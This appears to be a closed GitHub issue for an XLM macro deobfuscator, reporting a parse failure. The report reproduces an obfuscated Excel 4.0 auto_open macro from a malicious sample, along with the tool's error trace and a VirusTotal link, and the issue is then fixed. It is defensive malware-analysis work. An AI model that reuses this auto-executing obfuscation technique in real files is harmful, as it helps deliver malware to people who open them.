Closed seanthegeek closed 2 years ago
Deobfiscating the fallowing malicious macro fails
auto_open: auto_open->GERGEGSFWG!$F$1 SHEET: GERGEGSFWG, macrosheet CELL:F9, =FORMULA(Vuk1!C17, Vuk2!C14)=FORMULA(Vuk2!G8, Vuk3!D13)=FORMULA(Vuk3!I5, Vuk4!G7)=FORMULA(Vuk4!B13, Vuk5!E2)=FORMULA(Vuk5!D19, Vuk6!B13)=FORMULA(Vuk6!I4, Vuk7!F8)=FORMULA(Vuk7!B14, Vuk1!F2)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!D6&Vuk7!F8&Sssssbvr1!B15&Vuk7!F8&Sssssbvr1!F11&Vuk7!F8&Sssssbvr1!H3&Vuk7!F8&Sssssbvr1!J8&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30), False SHEET: Vuk1, macrosheet CELL:C17, =CHAR(CCwdbuk1!C54), = SHEET: Vuk2, macrosheet CELL:G8, =CHAR(CCwdbuk1!E49), A SHEET: Vuk3, macrosheet CELL:I5, =CHAR(CCwdbuk1!H48), L SHEET: Vuk4, macrosheet CELL:B13, =CHAR(CCwdbuk1!L52), e SHEET: Vuk5, macrosheet CELL:D19, =CHAR(CCwdbuk1!P50), C SHEET: Vuk6, macrosheet CELL:I4, =CHAR(CCwdbuk1!Q55), r SHEET: Vuk7, macrosheet CELL:B14, =CHAR(CCwdbuk1!B48), o
auto_open: auto_open->GERGEGSFWG!$F$1 [Starting Deobfuscation] Error [deobfuscator.py:2580 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', 'CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30)') at line 1, column 350. Expected one of: * QUOTE * EXCLAMATION * NUMBER * LBRACE * L_PRA * ERROR * BOOLEAN * ROW * /\$?([a-qs-z][a-z]?)\$?\d+\b|\$?(r[a-bd-z]?)\$?\d+\b(?!C)/i * NAME * STRING Previous tokens: [Token('CONCATOP', '&')] Files: [END of Deobfuscation]
Please share the sample or if it is on VT, its hash so I can test it. You can reach me directly via DM on Twitter, if you do not want to share the info here.
https://www.virustotal.com/gui/file/714469E1B0F10CE91DD8104A064A85586E29803B780C4F6AF829745B9BBD38B1
the issue is fixed in v2.3.4
Deobfiscating the fallowing malicious macro fails